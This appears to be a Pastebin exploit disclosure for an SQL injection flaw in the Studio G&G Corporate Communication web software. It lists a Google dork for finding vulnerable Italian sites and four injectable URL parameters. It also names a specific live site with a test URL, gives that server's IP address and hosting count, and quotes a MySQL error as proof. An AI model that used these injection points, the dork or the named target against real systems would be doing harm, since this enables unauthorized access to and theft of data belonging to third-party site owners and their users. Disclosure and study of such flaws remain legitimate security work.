Advertisement
KingSkrupellos

Studio G&G Corporate Communication Italy SQL Injection

Mar 15th, 2019
174
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.88 KB | None | 0 0
  1. ############################################################################################
  2.  
  3. # Exploit Title : Studio G&G Corporate Communication Italy SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 16/03/2019
  7. # Vendor Homepage : gegweb.it
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:Powered by Studio G&G Corporate Communication site:it
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  15. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  16. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  17.  
  18. ############################################################################################
  19.  
  20. # Impact :
  21. ***********
  22. Studio G&G Corporate Communication is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
  23.  
  24. data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or
  25.  
  26. modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request
  27.  
  28. to the vulnerable application and execute arbitrary SQL commands in application`s database. Further exploitation of this vulnerability
  29.  
  30. may result in unauthorized data manipulation. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  31.  
  32. ############################################################################################
  33.  
  34. # SQL Injection Exploit :
  35. **********************
  36. /prodotti.php?LANG=[ID-NUMBER]&id=prodotti&CAT=[SQL Injection]
  37.  
  38. /news.php?LANG=[ID-NUMBER]&id=news&news=[SQL Injection]
  39.  
  40. /family.php?LANG=[ID-NUMBER]&id=prodotti&CAT=[ID-NUMBER]&SUB=[ID-NUMBER]&SER=[SQL Injection]
  41.  
  42. /prodotti_select.php?LANG=[ID-NUMBER]&id=prodotti&CAT=[ID-NUMBER]&SUB=[ID-NUMBER]&SER=[ID-NUMBER]&PROD=[SQL Injection]
  43.  
  44. ############################################################################################
  45.  
  46. # Example Vulnerable Sites :
  47. *************************
  48. [+] priolinox.it/prodotti.php?LANG=2&id=prodotti&CAT=1%27
  49.  
  50. Vulnerable IP Address =>
  51.  
  52. (46.16.95.109) => There are 83 domains hosted on this server.
  53.  
  54. ############################################################################################
  55.  
  56. # Example SQL Database Error :
  57. ****************************
  58. You have an error in your SQL syntax; check the manual that corresponds
  59. to your MySQL server version for the right syntax to use near ''1''' at line 1
  60.  
  61. ############################################################################################
  62.  
  63. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  64.  
  65. ############################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement